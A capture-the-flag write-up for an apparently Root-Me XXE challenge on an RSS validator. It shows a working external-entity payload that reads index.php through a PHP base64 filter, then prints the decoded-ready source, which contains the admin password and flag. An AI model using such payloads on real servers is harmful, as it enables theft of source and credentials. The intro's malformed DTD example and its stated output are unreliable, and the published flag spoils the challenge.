FIRST OF ALL , WHAT IS XML ? PLEASE READ IT SLOWLY.
https://www.w3schools.com/xml/xml_whatis.aspOR WATCH THIS VIDEO ON YOUTUBE FOR FURTHER INFORMATION ABOUT XML ,XXE INJECTION.
https://www.youtube.com/watch?v=DREgLWZqMWgALRIGHT! WE HAVE BASIC KNOWLEDGES ABOUT XML & MORE . IN XML , WE HAVE TWO TYPES OF DTD : INTERNAL AND EXTERNAL
DTD IS STANDS FOR DOCUMENT TYPE DEFINITION WHICH DEFINES THE STRUCTURE AND THE LAGEL ELEMENTS AND ATTRIBUTES OF AN XML DOCUMENT . WITH A DTD, GROUPS OF PEOPLE CAN AGREE ON A STANDARD DTD OR DATA STRUCTURE FOR INTERCHANGING DATAWITH XXE INJETION ,WE MUST FOCUS ON EXTERNAL ENTITY WHICH HAVE THE SYNTAX BELOW
<!ENTITY entity-name SYSTEM "URL/URI">AND WE USE XML TO "READ" THIS DTD
<article>&entity-name;</article>
EXAMPLE
<!ENTTITY writer SYSTEM "https://www.article.com/entity.dtd"
<author>&writer;</author>THE OUTPUT INFORMATION IS : https://www.article.com/entity.dtd
AND LET'S LOOK THROUGH THE XXE CHALLENGE OF ROOTME
THE QUESTION IS : "WHAT IS RSS"
RSS is short for Really Simple Syndication and it’s a way to have information delivered to you. instead of you having to go find it.AND RSS BELONGS TO XML FAMILY . SO CLEARLY , WE MUST INPUT A LINK OF RSS CODE TO VALIDATE THIS CHECKER ENGINE . AFTER SEARCHING , I HAD A SIMPLE SOURCE CODE OF XML RSS ON W3C
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>W3Schools Home Page</title>
<link>https://www.w3schools.com</link>
<description>Free web building tutorials</description>
<item>
<title>RSS Tutorial</title>
<link>https://www.w3schools.com/xml/xml_rss.asp</link>
<description>New RSS tutorial on W3Schools</description>
</item>
<item>
<title>XML Tutorial</title>
<link>https://www.w3schools.com/xml</link>
<description>New XML tutorial on W3Schools</description>
</item>
</channel>
</rss>BECAUSE THE INPUT ONLY ACCEPTS A LINK . WE HAVE TO FIND SOME PLACE WHICH CAN STORAGE THIS CODE , AND I CHOSE PASTEBIN .
https://pastebin.com/raw/9T5CE8TjAFTER INPUTING THIS LINK , I COMPLETELY VALIDATED THIS CHECKER ENGINE
FIRST STEP DONE! BUT THE GOAL IS TO RETRIVE THE PASSWORD . WE MUST READ THE FILE ETC/PASSWD OR THE SOURCE CODE OF THIS CHALL . LET'S USE OUR KNOWLENDGES ABOUT XML AND DDT .
AFTER 3 HOURS SEARCHING AND TESTING , I COMPLETED THE PAYLOAD
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE rss [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]> <rss version="2.0"> <channel> <title>W3Schools Home Page</title> <link>https://www.w3schools.com</link> <description>Free web building tutorials</description> <item> <title>&xxe;</title> <link>https://www.w3schools.com/xml/xml_rss.asp</link> <description>New RSS tutorial on W3Schools</description> </item> <item> <title>XML Tutorial</title> <link>https://www.w3schools.com/xml</link> <description>New XML tutorial on W3Schools</description> </item> </channel> </rss>
THE BLUE ROWS IS WHAT I INJECT TO THE CODE , FORCE THE SERVER TO RESPOND THE SOURCE CODE !
php://filter/read=convert.base64-encode/resource=index.php TO READ THE SOURCE CODE VIA PHP WRAPPER
<title>&xxe;</title> TO PRINT THE VALUE OF FILE TO SCREEN , THIS CODE WAS STORAGED IN ITEM TAG TO PRINT.
AFTER N (N>40) TIME TRYING , I WAS REFUSED BECAUSE OF THE SERVER'S FILTER . SO I DECIDED TO ENCODE IT WITH BASE64 IN PHP WRAPPER QUERY . FORTUNATELY THE OUTPUT IS EXACTLY WHAT I EXPECTED
THE BASE64 CODE WAS
PD9waHAKCgplY2hvICc8aHRtbD4nOwplY2hvICc8aGVhZGVyPjx0aXRsZT5YWEU8L3RpdGxlPjwvaGVhZGVyPic7CmVjaG8gJzxib2R5Pic7CmVjaG8gJzxoMz48YSBocmVmPSI/YWN0aW9uPWNoZWNrZXIiPmNoZWNrZXI8L2E+Jm5ic3A7fCZuYnNwOzxhIGhyZWY9Ij9hY3Rpb249YXV0aCI+bG9naW48L2E+PC9oMz48aHIgLz4nOwoKCmlmICggISBpc3NldCgkX0dFVFsnYWN0aW9uJ10pICkgJF9HRVRbJ2FjdGlvbiddPSJjaGVja2VyIjsKCmlmKCRfR0VUWydhY3Rpb24nXSA9PSAiY2hlY2tlciIpewoKCWxpYnhtbF9kaXNhYmxlX2VudGl0eV9sb2FkZXIoZmFsc2UpOwoJbGlieG1sX3VzZV9pbnRlcm5hbF9lcnJvcnModHJ1ZSk7CgoJZWNobyAnPGgyPlJTUyBWYWxpZGl0eSBDaGVja2VyPC9oMj4KCTxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSJpbmRleC5waHAiPgoJPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InVybCIgcGxhY2Vob2xkZXI9Imh0dHA6Ly9ob3N0LnRsZC9yc3MiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiAvPgoJPC9mb3JtPic7CgoKCWlmKGlzc2V0KCRfUE9TVFsidXJsIl0pICYmICEoZW1wdHkoJF9QT1NUWyJ1cmwiXSkpKSB7CgkJJHVybCA9ICRfUE9TVFsidXJsIl07CgkJZWNobyAiPHA+VVJMIDogIi5odG1sZW50aXRpZXMoJHVybCkuIjwvcD4iOwoJCXRyeSB7CiAgICAgICAgICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCIkdXJsIik7CiAgICAgICAgICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKICAgICAgICAgICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMyk7CiAgICAgICAgICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VUICwwKTsgCiAgICAgICAgICAgICAgICAgICAgJGluamVjdCA9IGN1cmxfZXhlYyggJGNoICk7CiAgICAgICAgICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICAgICAgICAgICRzdHJpbmcgPSBzaW1wbGV4bWxfbG9hZF9zdHJpbmcoJGluamVjdCwgbnVsbCwgTElCWE1MX05PRU5UKTsKICAgICAgICAgICAgICAgICAgICBpZiAoICEgaXNfb2JqZWN0KCRzdHJpbmcpKSB0aHJvdyBuZXcgRXhjZXB0aW9uKCJlcnJvciIpOyAKICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICBmb3JlYWNoKCRzdHJpbmctPmNoYW5uZWwtPml0ZW0gYXMgJHJvdyl7CgkJICAgICAgICBwcmludCAiPGJyIC8+IjsKCQkgICAgICAgIHByaW50ICI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iOwoJCSAgICAgICAgcHJpbnQgIjxiciAvPiI7CgkJICAgICAgICBwcmludCBodG1sZW50aXRpZXMoJHJvdy0+dGl0bGUpOwoJCSAgICAgICAgcHJpbnQgIjxiciAvPiI7CgkJICAgICAgICBwcmludCAiPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09IjsKCQkgICAgICAgIHByaW50ICI8YnIgLz4iOwoJCSAgICAgICAgcHJpbnQgIjxoNCBzdHlsZT0nY29sb3I6IGdyZWVuOyc+WE1MIGRvY3VtZW50IGlzIHZhbGlkPC9oND4iOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiAkZSkgewogICAgICAgICAgICAgICAgICAgIHByaW50ICI8aDQgc3R5bGU9J2NvbG9yOiByZWQ7Jz5YTUwgZG9jdW1lbnQgaXMgbm90IHZhbGlkPC9oND4iOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgIAoJfQp9CgppZigkX0dFVFsnYWN0aW9uJ10gPT0gImF1dGgiKXsKZWNobyAnPHN0cm9uZz5Mb2dpbjwvc3Ryb25nPjxiciAvPjxmb3JtIE1FVEhPRD0iUE9TVCI+CjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1c2VybmFtZSIgLz4KPGJyIC8+CjxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIC8+CjxiciAvPgo8aW5wdXQgdHlwZT0ic3VibWl0IiAvPgo8L2Zvcm0+Cic7CmlmKGlzc2V0KCRfUE9TVFsndXNlcm5hbWUnXSwgJF9QT1NUWydwYXNzd29yZCddKSAmJiAhZW1wdHkoJF9QT1NUWyd1c2VybmFtZSddKSAmJiAhZW1wdHkoJF9QT1NUWydwYXNzd29yZCddKSkKCXsKCQkkdXNlcj0kX1BPU1RbInVzZXJuYW1lIl07CgkJJHBhc3M9JF9QT1NUWyJwYXNzd29yZCJdOwoJCWlmKCR1c2VyID09PSAiYWRtaW4iICYmICRwYXNzID09PSAiYzkzNGZlZDE3ZjFjYWMzMDQ1ZGRmZWNhMzRmMzMyYmMiKXsKCgkJCXByaW50ICJGbGFnIDogYzkzNGZlZDE3ZjFjYWMzMDQ1ZGRmZWNhMzRmMzMyYmM8YnIgLz4iOwoKCQl9CgoJfQoKfQoKCmVjaG8gJzwvYm9keT48L2h0bWw+JzsKPz4K
DECODE IT AND I HAD THE FLAG FOR 35 POINTS! 😀
HAPPY HACKING!